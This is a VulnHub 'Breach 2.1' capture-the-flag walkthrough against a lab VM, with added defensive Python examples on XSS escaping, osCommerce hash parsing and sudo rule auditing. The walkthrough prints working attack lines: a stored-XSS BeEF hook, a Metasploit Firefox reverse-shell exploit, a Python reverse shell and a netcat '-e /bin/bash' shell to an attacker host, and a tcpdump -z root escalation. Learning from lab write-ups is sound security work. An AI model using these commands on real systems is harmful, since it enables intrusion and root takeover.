[VULNHUB] Breach: 2.1

With this awesome Boot2Root VM I learned a lot about XSS, client-side attacks and privilege escalation too. Let’s start.

PART ONE

I always start with an nmap scan:

nmap 192.168.110.151 -sV

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:02 CEST
Nmap scan report for 192.168.110.151
Host is up (0.0034s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

OK, something seemed off, so I retried the command with a full port-range scan:

nmap -sV -p 1-65535 192.168.110.151

Now it is more interesting:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:05 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds

There is only an SSH server to analyze. So I tried to log in:

ssh 192.168.110.151 -p 65535

And a banner appeared:

#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#            All connections are monitored and recorded                #
#                Unauthorized access is encouraged                     #
#        Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   # 
#############################################################################

I collected a username (peter) but I still had to find the password, which is “in the source”. I lost 2 days looking for it before I finally guessed it: “inthesource”. So I connected to SSH again with peter as the username:

ssh peter@192.168.110.151 -p 65535

I used inthesource as the password and I couldn’t believe that it worked. Unfortunately, right after authenticating I got this:

Connection to 192.168.110.151 closed.

That was strange, so I retried an nmap scan:

nmap -sV -p 1-65535 192.168.110.151

And I found that port 80 was now open:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:11 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds

OK, I visited http://192.168.110.151 and only a welcome page appeared. Looking at the source code I found this:

<!--I like hints! Here at Initech we don't trust our users and either should you!--<
<!--I'm not just going to stick creds here, really, I'm not. Sorry-->

Really useful! 😉
I rechecked the SSH banner and noticed that it talks about a blog, so maybe there was a subdirectory to find. I could have used dirbuster but I just guessed the URL: http://192.168.110.151/blog. It is a simple blog and after some research I found a persistent XSS in the register page. So I used the BeEF framework to hook a possible victim browser:

sudo beef-xss -x

I typed ” into the username input field of the register page, followed by a script tag with http://192.168.110.2:3000/hook.js as its src attribute. After some minutes the victim’s browser was hooked. I tried to run some commands from BeEF without success, so I took a look at the User-Agent:
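The persistent XSS above works because the register page stores whatever was typed as the username and some later page echoes it into HTML unescaped, so the victim who views it runs the injected script. The following is an added example (not code from the original post or from the VM’s blog software) showing the vulnerable rendering beside the fixed one; the HTML fragment, the payload string and the attacker.example URL are constructed for the demo.

```python
import html
import re

# Constructed sample payload: the kind of value a stored XSS in a registration
# form carries.  The leading quote closes the attribute the username is echoed
# into, then a script tag points at an external host (placeholder URL).
CONSTRUCTED_PAYLOAD = '"><script src="http://attacker.example/hook.js"></script>'

# Allowlist for usernames: letters, digits, dot, dash, underscore; 3 to 32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")


def render_user_row_vulnerable(username: str) -> str:
    """Admin view that concatenates the stored username straight into HTML.
    This is the bug: whatever was submitted at register time is interpreted
    as markup in the browser of whoever later views the user list."""
    return f'<tr><td><input type="text" value="{username}"></td></tr>'


def render_user_row_fixed(username: str) -> str:
    """Same view with contextual output encoding.  html.escape (quote=True by
    default) turns <, >, &, " and ' into entities, so the stored value can
    neither close the attribute nor open a tag."""
    return f'<tr><td><input type="text" value="{html.escape(username)}"></td></tr>'


def validate_username(username: str) -> bool:
    """Input allowlist applied at registration time.  Output encoding is the
    real fix; rejecting odd characters on input is defence in depth in case
    some other template forgets to escape."""
    return USERNAME_RE.fullmatch(username) is not None


def contains_markup(fragment: str) -> bool:
    """Demo check: does a raw script tag survive into the rendered page?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_user_row_vulnerable(CONSTRUCTED_PAYLOAD))
    print(render_user_row_fixed(CONSTRUCTED_PAYLOAD))
    print("allowlist accepts payload:", validate_username(CONSTRUCTED_PAYLOAD))
```

The escaped row still displays the odd username to the administrator, but as text; a Content-Security-Policy that disallows script from other origins would have blocked the hook.js load as a second layer even if the encoding were missing.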

Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0

Our victim, who is Peter, is using Firefox 15, which is vulnerable. So I fired up Metasploit:

sudo msfconsole
use exploit/multi/browser/firefox_proto_crfmrequest
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.110.2
set URIPATH shell
set LHOST 192.168.110.2
exploit

Then I went to the register page again and typed this as the iframe src, after the “:

http://192.168.110.2/shell

After some minutes I got a shell in Metasploit and I upgraded it to a Meterpreter session:

sessions -u 0

Now I invoked the Unix shell:

shell

And I got a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I was logged in as peter. I browsed to the /home directory and collected two new usernames:
milton
bill

PART TWO

I moved to the /tmp folder and downloaded LinEnum. I gave it execution permissions:

chmod +x LinEnum.sh

And I ran it:

./LinEnum.sh

I discovered that there was a MySQL server accessible as root without a password. So I connected to it:

mysql -h 127.0.0.1 -u root

First of all I listed the databases:

SHOW databases;

This is the output:

+--------------------+
| Database           |
+--------------------+
| information_schema |
| blog               |
| mysql              |
| oscommerce         |
| performance_schema |
+--------------------+
5 rows in set (0.03 sec)

Then I looked into oscommerce:

USE oscommerce;
SHOW tables;
SELECT * FROM osc_administrators;

And this is the table content:

+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
|  1 | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

The password seems to be an MD5 hash, so I browsed to CrackStation and pasted the hashed password without the :32. I discovered that the password was 32admin, which is a little strange; maybe the 32 is the salt, so the real password is just admin.

Looking again at the LinEnum output I saw that the VM was listening on port 2323, so I just connected to it with telnet:
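The guess about the 32 is right: the classic osCommerce 2.x scheme, as I understand it, stores md5(salt + password) followed by ":" and the two-character salt, which is why CrackStation’s preimage of the bare digest came back as 32admin. The following is an added example (not the osCommerce project’s own code) that parses that format and shows why the scheme offers so little protection: MD5 is fast and the salt is two characters, so the salted preimage is still short enough for a lookup table. The stored value comes from the table above; the candidate passwords are constructed for the demo.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Stored value from the osc_administrators table shown above.
STORED_FROM_PAGE = "685cef95aa31989f2edae5e055ffd2c9:32"


def parse_osc_hash(stored: str) -> Tuple[str, str]:
    """Split the osCommerce-style 'md5hex:salt' value into digest and salt."""
    digest, sep, salt = stored.partition(":")
    if sep != ":" or len(digest) != 32:
        raise ValueError("not an osCommerce-style md5:salt value")
    return digest, salt


def osc_hash(plain: str, salt: str) -> str:
    """Reproduce the scheme assumed in the lead-in: md5(salt + plain), then ':salt'."""
    digest = hashlib.md5((salt + plain).encode()).hexdigest()
    return f"{digest}:{salt}"


def osc_verify(candidate: str, stored: str) -> bool:
    """Check one candidate against a stored value with a constant-time compare.
    This is what the login code does; the weakness is the hash, not the check."""
    digest, salt = parse_osc_hash(stored)
    recomputed = hashlib.md5((salt + candidate).encode()).hexdigest()
    return hmac.compare_digest(recomputed, digest)


def password_from_preimage(stored: str, cracked_preimage: str) -> Optional[str]:
    """A lookup service that only saw the digest returns salt+password ('32admin').
    Strip the salt prefix to get the real password; None if the prefix is missing."""
    _, salt = parse_osc_hash(stored)
    if cracked_preimage.startswith(salt):
        return cracked_preimage[len(salt):]
    return None


if __name__ == "__main__":
    print("salt:", parse_osc_hash(STORED_FROM_PAGE)[1])
    print("real password behind '32admin':", password_from_preimage(STORED_FROM_PAGE, "32admin"))
    print("'admin' verifies against the stored value:", osc_verify("admin", STORED_FROM_PAGE))
```

From a defender’s side the lesson is the usual one: an application that still stores md5(salt + password) with a two-character salt should be migrated to a slow, per-user-salted KDF such as bcrypt or argon2 on the next successful login.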

telnet 127.0.0.1 2323

I found some coordinates and a login prompt appeared:

29 45'46" N 95 22'59" W

Looking with Google Maps I discovered that these coordinates point to the Houston Police Department Memorial. I needed a username to log in: I tried milton but a password prompt appeared; I tried Houston and it worked, but immediately a countdown showed up (3…2…1…) followed by a question to answer:

Whose stapler is it?

Of course, it’s mine! So I used mine as the password and I got a shell as milton. Looking around I discovered that the /var/www folder contained an html2 folder, which in turn contained another folder: oscommerce. At this point there was nothing else to do, so I tried a rescan with nmap:

nmap -sV -p 1-65535 192.168.110.151

Magically a new HTTP port was open: 8888. I browsed to http://192.168.110.151:8888, which had directory listing enabled. I clicked on /oscommerce and the site showed up. I went to http://192.168.110.151:8888/oscommerce/admin and used the admin:admin credentials to log in. Now I needed to find an upload form, and I discovered a File Manager under the Tools tab. Unfortunately I couldn’t upload anything into the web server root directory, so I found a writable folder: includes/work. I uploaded the b374k PHP shell and typed this into its Terminal tab:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But before pressing ENTER I started listening locally:

sudo nc -lvp 1234

Now I got the shell and I was logged in as blumbergh. Next I tried to escalate privileges.

PART THREE

First I checked which commands this user could run with sudo:

sudo -l

I discovered that this user can execute tcpdump as root, and I know that tcpdump’s -z option runs a post-rotate command. So I switched to /tmp and typed:

echo "nc 192.168.110.2 1235 -e /bin/bash" > shell.sh

I gave it +x permission:

chmod +x shell.sh

Then I started to listen locally:

sudo nc -lvp 1235

Then I executed the following command:

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
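The root shell comes from a sudo rule that allows tcpdump with any arguments, so -z can name a script and -Z root keeps it running as root. The thing a defender wants here is a quick audit of sudo -l output for exactly this class of rule. The following is an added example (not code from the original post or from LinEnum) that parses sudo -l output and flags unrestricted ALL rules and argument-driven command execution; the sample output is constructed, the tcpdump line mirrors the privilege found above, and the ARG_EXEC_RISK table only lists the case this page documents.

```python
import re
from typing import Dict, List

# Constructed sample of `sudo -l` output.  The tcpdump line mirrors the rule
# found in the write-up; the other two lines are made up for contrast.
CONSTRUCTED_SUDO_L = """\
Matching Defaults entries for blumbergh on this host:
    env_reset, mail_badpass

User blumbergh may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/tcpdump
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: ALL
"""

# Binaries whose ordinary options let the invoker run another program.
# Only the case the page documents is listed; extend it for your own audits.
ARG_EXEC_RISK = {
    "tcpdump": "-z <cmd> runs a post-rotate command and -Z root keeps it as root",
}

# (runas) [TAG: ...] command  -- the shape of each rule line in `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> List[Dict[str, str]]:
    """Return the rule lines of `sudo -l` as dicts with runas, tags and cmd."""
    rules: List[Dict[str, str]] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"], "tags": m["tags"].strip(), "cmd": m["cmd"].strip()})
    return rules


def audit_sudo_rules(text: str) -> List[str]:
    """One finding per rule that hands the user a root shell.

    A command listed without arguments may be run with any arguments, which is
    what turns tcpdump's -z into a root shell; a rule that pins the arguments
    (like the systemctl line) is not flagged."""
    findings = []
    for rule in parse_sudo_l(text):
        cmd = rule["cmd"]
        if cmd == "ALL":
            findings.append(f"{cmd}: unrestricted sudo as ({rule['runas']})")
            continue
        words = cmd.split()
        binary = words[0].rsplit("/", 1)[-1]
        if binary in ARG_EXEC_RISK and len(words) == 1:
            findings.append(f"{cmd}: {ARG_EXEC_RISK[binary]}; pin the arguments or drop the rule")
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(CONSTRUCTED_SUDO_L):
        print("FINDING:", finding)
```

Pinning arguments in sudoers is fragile for a tool with as many options as tcpdump; the cleaner fix is to not grant it through sudo at all and instead give the capture user CAP_NET_RAW and CAP_NET_ADMIN on the binary, so no root context exists for -z to inherit.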

Got the shell as root! Then I browsed to /root and I listed the files:

ls -al

I gave +x permission to .flag.py and executed it:

./.flag.py

VM completed!
